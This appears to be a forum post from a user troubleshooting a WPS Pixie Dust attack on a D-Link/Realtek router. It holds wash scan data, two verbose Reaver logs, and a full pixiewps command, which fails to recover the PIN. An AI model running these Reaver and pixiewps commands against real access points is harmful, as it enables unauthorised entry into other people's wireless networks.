I Did Run the comand as mentioned above Twice
I also ran Pixiewps with the data collected from reaver with -f
WASH DATA :
Code:
bssid" : "1C:5F:2B:06:A4:18", "essid" : "TRIAL", "channel" : 7, "rssi" : -78, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "D-Link Corp.", "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" : "RTL8196d", "wps_serial" : "123456789012347", "wps_uuid" : "112233445566778899aa1c5f2b06a418", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
__________________________________________________ __________________________________________________ ___
Code:
root@kali:~# reaver -i wlan0mon -b 1C:5F:2B:06:A4:18 -c 7 -vvv -K -f
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching wlan0mon to channel 7
[?] Restore previous session for 1C:5F:2B:06:A4:18? [n/Y] n
[+] Waiting for beacon from 1C:5F:2B:06:A4:18
[+] Received beacon from 1C:5F:2B:06:A4:18
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:333
send_packet called from authenticate() 80211.c:364
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
send_packet called from associate() 80211.c:417
[+] Sending association request
[+] Associated with 1C:5F:2B:06:A4:18 (ESSID: TRIAL)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=412 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 1c 5f 2b 06 a4 18
WPS: Enrollee MAC Address 1c:5f:2b:06:a4:18
WPS: Enrollee Nonce - hexdump(len=16): 7e e9 68 0c 07 a7 e6 b2 a1 86 c5 4c 02 e9 74 10
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=12):
44 2d 4c 69 6e 6b 20 43 6f 72 70 2e D-Link Corp.
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 78 78 78 RTL8xxx
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 31 30 2d 30 39 2d 32 30 EV-2010-09-20
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=8):
52 54 4c 38 31 39 36 64 RTL8196d
WPS: Enrollee RF Bands 0x2
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 36 05 66 51 0c 1f 98 6a 32 38 17 2b 96 8a 54 6e
WPS: UUID-R - hexdump(len=16): c9 41 d5 da 95 92 a6 97 d7 aa f9 de 6a bf 89 63
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1 1b bc fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7 7f 14 f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80 3c 74 3d 4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef 4d 38 24 00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2 ca a9 22 dc c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19 ae d2 20 c2 52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6 18 91 e9 56 82 1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64 8d d4 f8 b1 5e 0c 62 d5 2f be 22 4f 94 ef 9f ad d0
DH: public value - hexdump(len=192): cd 96 10 77 9f 35 f5 de 13 61 82 8f 80 f7 09 da 98 80 08 bf ad 71 55 35 81 15 21 bc 5a 59 67 ba 2c 54 82 ac 46 3b 98 f4 97 55 48 61 fc 07 4a e0 ac 90 37 59 ec 73 90 09 1c 0d e1 8c 3e 8b a9 6a 0c 51 ca dc 7f 04 6b 27 86 de 4e d9 dc 97 91 ac e9 fc 73 11 05 90 6c 46 ce 48 32 78 10 9e 94 ea 15 1e 50 7f 65 ef dc 50 e0 99 04 4d 59 e5 72 f8 9c a4 e7 16 af 8f 8a d9 60 f9 f4 e3 61 df f5 40 01 1c de e0 16 f9 ca 81 2f 6c f5 58 1c 41 6d b6 74 ec c5 c9 75 9c 48 fc e3 1a 8d d3 01 24 cf 95 cc 09 5c f1 5e 45 f1 24 26 cb d4 31 fa 09 02 20 28 2b 56 f5 8c 53 a7 99 0c 8f 23 f7 e4 0b 1e 38
WPS: DH Private Key - hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1 1b bc fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7 7f 14 f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80 3c 74 3d 4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef 4d 38 24 00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2 ca a9 22 dc c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19 ae d2 20 c2 52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6 18 91 e9 56 82 1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64 8d d4 f8 b1 5e 0c 62 d5 2f be 22 4f 94 ef 9f ad d0
WPS: DH own Public Key - hexdump(len=192): cd 96 10 77 9f 35 f5 de 13 61 82 8f 80 f7 09 da 98 80 08 bf ad 71 55 35 81 15 21 bc 5a 59 67 ba 2c 54 82 ac 46 3b 98 f4 97 55 48 61 fc 07 4a e0 ac 90 37 59 ec 73 90 09 1c 0d e1 8c 3e 8b a9 6a 0c 51 ca dc 7f 04 6b 27 86 de 4e d9 dc 97 91 ac e9 fc 73 11 05 90 6c 46 ce 48 32 78 10 9e 94 ea 15 1e 50 7f 65 ef dc 50 e0 99 04 4d 59 e5 72 f8 9c a4 e7 16 af 8f 8a d9 60 f9 f4 e3 61 df f5 40 01 1c de e0 16 f9 ca 81 2f 6c f5 58 1c 41 6d b6 74 ec c5 c9 75 9c 48 fc e3 1a 8d d3 01 24 cf 95 cc 09 5c f1 5e 45 f1 24 26 cb d4 31 fa 09 02 20 28 2b 56 f5 8c 53 a7 99 0c 8f 23 f7 e4 0b 1e 38
WPS: DH Private Key - hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1 1b bc fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7 7f 14 f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80 3c 74 3d 4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef 4d 38 24 00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2 ca a9 22 dc c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19 ae d2 20 c2 52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6 18 91 e9 56 82 1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64 8d d4 f8 b1 5e 0c 62 d5 2f be 22 4f 94 ef 9f ad d0
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): 12 61 d7 7f 7a a5 63 2a 82 3d 52 00 26 ce 47 b2 81 d3 09 fb a8 3c 9e dd 9c 7c 21 45 93 95 73 10 4d cc 1c 1e 17 86 76 72 d8 17 8d 54 06 1f 1f 13 bb 8c c0 5c d7 e7 93 f9 99 7c fb 4f 42 84 5c 5b 4f 7c 3b 3d a2 c0 f5 26 29 f8 19 8d ad 1a d7 9e c9 12 f2 d8 d9 d0 04 7a 5d b9 85 c2 9c ea 1b c8 c7 db 5a dc 76 f8 fc 24 ff f2 0f 02 b3 d4 ec c0 68 8a e5 03 5a bf 58 6e d3 e6 c0 20 e2 d3 f5 36 40 40 be 3b df 40 31 aa 1f 5a 7f 8f b8 fe b2 74 02 2b 0c ec 0d 84 b6 d6 e1 a2 22 0f 64 01 27 9a b2 1c 90 a3 a0 7f ce 28 02 0c cb 9e d0 fc 18 2c 00 2a 56 1b da 18 b4 72 48 a1 30 92 bb 48 84 a7
WPS: DH shared key - hexdump(len=192): 12 61 d7 7f 7a a5 63 2a 82 3d 52 00 26 ce 47 b2 81 d3 09 fb a8 3c 9e dd 9c 7c 21 45 93 95 73 10 4d cc 1c 1e 17 86 76 72 d8 17 8d 54 06 1f 1f 13 bb 8c c0 5c d7 e7 93 f9 99 7c fb 4f 42 84 5c 5b 4f 7c 3b 3d a2 c0 f5 26 29 f8 19 8d ad 1a d7 9e c9 12 f2 d8 d9 d0 04 7a 5d b9 85 c2 9c ea 1b c8 c7 db 5a dc 76 f8 fc 24 ff f2 0f 02 b3 d4 ec c0 68 8a e5 03 5a bf 58 6e d3 e6 c0 20 e2 d3 f5 36 40 40 be 3b df 40 31 aa 1f 5a 7f 8f b8 fe b2 74 02 2b 0c ec 0d 84 b6 d6 e1 a2 22 0f 64 01 27 9a b2 1c 90 a3 a0 7f ce 28 02 0c cb 9e d0 fc 18 2c 00 2a 56 1b da 18 b4 72 48 a1 30 92 bb 48 84 a7
WPS: DHKey - hexdump(len=32): ad 59 c3 66 6f f2 5d 09 2b bf 69 98 dd b9 80 d5 de 15 19 ce 75 d5 52 1d a3 97 20 bb ae f8 d1 4d
WPS: KDK - hexdump(len=32): 30 82 a2 06 ab 4b be bd 8a 3a 69 e1 7d c2 d9 1a 96 e6 97 75 91 19 df 9e 91 d7 40 06 29 b8 64 89
WPS: AuthKey - hexdump(len=32): 01 81 09 14 51 74 29 6a 5f b8 10 2a f6 82 9c b7 b3 40 ae 0e 57 86 76 d3 50 d9 61 14 b9 b1 b1 a8
WPS: KeyWrapKey - hexdump(len=16): 6a f9 5d a3 8b 61 45 e5 ef 9b 76 dd 08 77 cf 0f
WPS: EMSK - hexdump(len=32): dc f8 0d 26 b4 dd f4 bf d5 ec a6 6a b1 22 22 28 1b 08 69 05 72 13 cc ea cb b8 cb 37 7b a0 43 27
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 19 07 d8 f4 f4 8d f6 45 69 75 8c 6f 2d df 38 8c 7b bc 8a bc b5 c9 8c 39 b8 86 5d d9 19 dd 9d 4a
WPS: E-Hash2 - hexdump(len=32): d8 15 59 67 86 d0 4d 68 86 cc 28 76 07 9a 57 5c ce 57 69 9d fc e1 33 2f 30 3c 45 62 01 2c a8 54
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 1907d8f4f48df64569758c6f2ddf388c7bbc8abcb5c98c39b8865dd919dd9d4a -z d815596786d04d6886cc2876079a575cce57699dfce1332f303c4562012ca854 -a 018109145174296a5fb8102af6829cb7b340ae0e578676d350d96114b9b1b1a8 -n 7ee9680c07a7e6b2a186c54c02e97410 -r cd9610779f35f5de1361828f80f709da988008bfad715535811521bc5a5967ba2c5482ac463b98f497554861fc074ae0ac903759ec7390091c0de18c3e8ba96a0c51cadc7f046b2786de4ed9dc9791ace9fc731105906c46ce483278109e94ea151e507f65efdc50e099044d59e572f89ca4e716af8f8ad960f9f4e361dff540011cdee016f9ca812f6cf5581c416db674ecc5c9759c48fce31a8dd30124cf95cc095cf15e45f12426cbd431fa090220282b56f58c53a7990c8f23f7e40b1e38
Pixiewps 1.4
[-] WPS pin not found!
[*] Time taken: 0 s 54 ms
Code:
root@kali:~# reaver -i wlan0mon -b 1C:5F:2B:06:A4:18 -c 7 -vvv -K -f
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching wlan0mon to channel 7
[?] Restore previous session for 1C:5F:2B:06:A4:18? [n/Y] n
[+] Waiting for beacon from 1C:5F:2B:06:A4:18
[+] Received beacon from 1C:5F:2B:06:A4:18
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:333
send_packet called from authenticate() 80211.c:364
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
send_packet called from associate() 80211.c:417
[+] Sending association request
[+] Associated with 1C:5F:2B:06:A4:18 (ESSID: TRIAL)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
WPS: Processing received message (len=412 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 1c 5f 2b 06 a4 18
WPS: Enrollee MAC Address 1c:5f:2b:06:a4:18
WPS: Enrollee Nonce - hexdump(len=16): ce 12 19 30 9e c2 dc 9b d3 3a 70 ee f8 46 39 5b
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=12):
44 2d 4c 69 6e 6b 20 43 6f 72 70 2e D-Link Corp.
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 78 78 78 RTL8xxx
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 31 30 2d 30 39 2d 32 30 EV-2010-09-20
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=8):
52 54 4c 38 31 39 36 64 RTL8196d
WPS: Enrollee RF Bands 0x2
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 01 42 17 e4 d7 d7 d8 0c 3f f7 90 03 05 9f 47 85
WPS: UUID-R - hexdump(len=16): a2 52 65 da 4e 46 4d cc c2 9e 93 4d 23 8b cf 6d
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d 3f 7f e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1 6a 13 59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73 8d db ba 2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a 42 95 24 86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69 db 1d fc 45 09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0 68 0d 38 21 ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1 8a a3 d1 f2 a6 00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea 9e 76 05 49 98 37 60 12 4a 89 42 b4 fa cd fe 7d 71
DH: public value - hexdump(len=192): 61 68 31 8e b6 a1 b1 8b e7 88 80 b1 4a 34 34 53 13 1f b1 c2 39 11 57 29 83 c5 98 48 51 e4 f7 3e dd 27 db 68 51 51 77 df 0e 3b a4 92 37 1b 89 be 85 96 06 1f e7 99 7a 44 52 26 4d 45 aa 91 ec 8b b8 fe b8 81 0f 34 5c d4 b1 c9 84 63 83 c6 84 32 e4 8a 83 07 25 72 97 3e 2b 8d a5 e1 d0 7c c8 28 0e 94 17 4d a9 cc 98 a8 25 22 20 98 5a 11 e1 7c 22 13 6b fd 30 be 69 16 67 f4 e3 18 6b 52 ab 58 ec 46 6a 5d 7a 96 63 46 b7 42 62 c4 5c 57 17 57 01 79 66 ba 55 3d 29 8a c4 86 66 0e f3 bc d4 26 73 ca cb 80 c8 25 ee 52 80 9f 9a 9a 54 75 86 98 5d 13 c3 e8 d8 47 fd 99 2d 82 8d 4f c6 ba e8 2a
WPS: DH Private Key - hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d 3f 7f e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1 6a 13 59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73 8d db ba 2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a 42 95 24 86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69 db 1d fc 45 09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0 68 0d 38 21 ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1 8a a3 d1 f2 a6 00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea 9e 76 05 49 98 37 60 12 4a 89 42 b4 fa cd fe 7d 71
WPS: DH own Public Key - hexdump(len=192): 61 68 31 8e b6 a1 b1 8b e7 88 80 b1 4a 34 34 53 13 1f b1 c2 39 11 57 29 83 c5 98 48 51 e4 f7 3e dd 27 db 68 51 51 77 df 0e 3b a4 92 37 1b 89 be 85 96 06 1f e7 99 7a 44 52 26 4d 45 aa 91 ec 8b b8 fe b8 81 0f 34 5c d4 b1 c9 84 63 83 c6 84 32 e4 8a 83 07 25 72 97 3e 2b 8d a5 e1 d0 7c c8 28 0e 94 17 4d a9 cc 98 a8 25 22 20 98 5a 11 e1 7c 22 13 6b fd 30 be 69 16 67 f4 e3 18 6b 52 ab 58 ec 46 6a 5d 7a 96 63 46 b7 42 62 c4 5c 57 17 57 01 79 66 ba 55 3d 29 8a c4 86 66 0e f3 bc d4 26 73 ca cb 80 c8 25 ee 52 80 9f 9a 9a 54 75 86 98 5d 13 c3 e8 d8 47 fd 99 2d 82 8d 4f c6 ba e8 2a
WPS: DH Private Key - hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d 3f 7f e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1 6a 13 59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73 8d db ba 2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a 42 95 24 86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69 db 1d fc 45 09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0 68 0d 38 21 ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1 8a a3 d1 f2 a6 00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea 9e 76 05 49 98 37 60 12 4a 89 42 b4 fa cd fe 7d 71
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): d5 ef c1 da 43 0a a2 2c 86 53 60 fb 7d e7 ea 64 b8 48 15 3d 58 1f 49 fe 60 e3 4e 51 73 fa 22 9d f5 91 fe ea 5b 82 bf 02 20 0d 62 a4 d5 87 19 ce 9d b2 ce fc ca f3 8e 27 21 a4 9b 57 6a bf a8 cc 45 57 3c c1 35 fa dd bc 1f 6b 7b a9 01 e2 8e 87 42 b0 6d 72 26 04 2c 7b 3c 9c 43 f8 5f fa 3f 5c 49 72 61 87 67 1a 09 71 6c b3 16 02 83 85 6f 61 7f 07 31 ef 84 11 cb 45 6e e0 b2 64 64 6a 40 53 70 08 3b ef 8b cd f8 18 80 8d c4 03 98 83 af 55 22 5e 32 46 73 c6 6d d6 7f 12 cc fe c5 38 14 53 bb 0c b6 49 08 d1 6e 4a c2 a5 c4 8a 38 bc b9 de 51 6f 41 d6 36 24 fd 2d ae 78 da 4b 7a 51 1e 88
WPS: DH shared key - hexdump(len=192): d5 ef c1 da 43 0a a2 2c 86 53 60 fb 7d e7 ea 64 b8 48 15 3d 58 1f 49 fe 60 e3 4e 51 73 fa 22 9d f5 91 fe ea 5b 82 bf 02 20 0d 62 a4 d5 87 19 ce 9d b2 ce fc ca f3 8e 27 21 a4 9b 57 6a bf a8 cc 45 57 3c c1 35 fa dd bc 1f 6b 7b a9 01 e2 8e 87 42 b0 6d 72 26 04 2c 7b 3c 9c 43 f8 5f fa 3f 5c 49 72 61 87 67 1a 09 71 6c b3 16 02 83 85 6f 61 7f 07 31 ef 84 11 cb 45 6e e0 b2 64 64 6a 40 53 70 08 3b ef 8b cd f8 18 80 8d c4 03 98 83 af 55 22 5e 32 46 73 c6 6d d6 7f 12 cc fe c5 38 14 53 bb 0c b6 49 08 d1 6e 4a c2 a5 c4 8a 38 bc b9 de 51 6f 41 d6 36 24 fd 2d ae 78 da 4b 7a 51 1e 88
WPS: DHKey - hexdump(len=32): 4a 3b 5d 85 4e 40 bd 4f 38 27 06 6a 5a 9f 80 fb 9d 27 dd b6 21 ef ac 13 7e 52 ff e8 8c ec 30 4f
WPS: KDK - hexdump(len=32): f9 5d b0 3a d6 b8 4e 84 c7 57 a0 c4 d2 bc d5 bd 4f 2f 2e 55 91 25 40 19 7f b8 33 54 b7 99 04 f6
WPS: AuthKey - hexdump(len=32): 24 2c c4 39 5c 80 52 2e db dc 28 7a 4d 28 0f 7e d3 b3 c4 ca 98 e5 26 b7 5e 20 e0 6c c9 01 39 e3
WPS: KeyWrapKey - hexdump(len=16): ba d7 c8 bd 40 6d 69 44 d5 ea 4f 82 02 0a 2b 4a
WPS: EMSK - hexdump(len=32): 61 bf f1 c9 cd 6d 4e 91 18 98 fe d4 ab d3 ee 3a 23 e1 98 ad 20 82 9e 21 ed 53 87 bd e6 b0 14 2f
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 7a 7c 07 1e 89 8e 1c f6 70 6c 63 19 5a a8 43 fb e9 c3 db 0d 6d 29 d9 70 d1 1b e4 70 12 0b e6 11
WPS: E-Hash2 - hexdump(len=32): db 62 95 83 3b e0 ce bc ba db c2 e0 1b cf aa e3 1f 68 3c c2 77 3f 4c 20 1f 8f ae 2b 73 0b 52 52
